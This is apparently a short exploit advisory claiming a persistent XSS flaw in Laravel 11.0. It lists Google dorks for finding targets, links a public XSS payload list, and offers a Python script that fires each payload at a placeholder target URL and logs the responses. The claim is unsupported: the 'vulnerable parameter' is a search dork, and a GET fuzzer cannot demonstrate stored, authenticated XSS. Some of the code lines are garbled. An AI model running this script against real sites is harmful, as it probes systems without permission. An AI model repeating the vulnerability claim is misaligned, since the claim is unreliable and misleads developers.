Laravel 11.0 Cross Site Scripting

/*!
- # VULNERABILITY: Cross Site Scripting Laravel version 11.0 
- # Authenticated Persistent XSS
- # GOOGLE DORK: inurl:.com/?q=
- # GOOGLE DORK: Site:.com/?q=
- # DATE: 2024-12-01
- # SECURITY RESEARCHER:  E1.Coders
- # VENDOR: LARAVEL [https://laravel.com/ ]- # SOFTWARE LINK: https://laravel.com/docs/11.x/installation
- # CVSS: AV:N/AC:L/PR:H/UI:N/S:C
- # CWE: CWE-79
- # download payload https://raw.githubusercontent.com/payloadbox/xss-payload-list/refs/heads/master/Intruder/xss-payload-list.txt
*/
 
 
### -- [ Info: ] 
[i] A valid persistent XSS vulnerability was discovered in of the Laravel version 11.0  website.
 
[i] Vulnerable parameter(s): - inurl:.com/?q=    [AND]    Site:.com/?q=
 
 
### -- [ Impact: ] 
[~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.
 
 
### -- [ EXPLOIT : ] 
 
 
import requests
 
# Target URL
url = "https://TARGET.com/?q="
 
# Function to read payloads from a file
def read_payloads(filename="payloads.txt"):
    try:
        with open(filename, "r") as f:
            payloads = [line.strip() for line in f]        return payloads
    except FileNotFoundError:
        print(f"Error: File '{filename}' not found.")
        return [] 
# Function to perform the request
def xss_attack(url, payload):
    full_url = url + payload
    try:
        response = requests.get(full_url)
        return response.status_code, response.text # return status code and response text
    except requests.exceptions.RequestException as e:
        print(f"An error occurred during the request: {e}")
        return None, None
 
# Main function to iterate over payloads and attack
def main():
    payloads = read_payloads()
    if not payloads:
        return
 
    results = []    for payload in payloads:
        status_code, response_text = xss_attack(url, payload)
        if status_code:
          results.append({"payload": payload, "status_code": status_code, "response": response_text})
 
    #Save results to a file (Example, you might need to adjust based on your desired output)
    with open("attack_results.txt", "w") as f:
        for result in results:
            f.write(f"Payload: {result['payload']}\n")
            f.write(f"Status Code: {result['status_code']}\n")
            f.write(f"Response: {result['response']}\n\n")
 
if __name__ == "__main__":
    main()
 
 
 
### -- [ Contacts: ] 
[+] E-Mail: [email protected]
 
[+] GitHub: @e1coders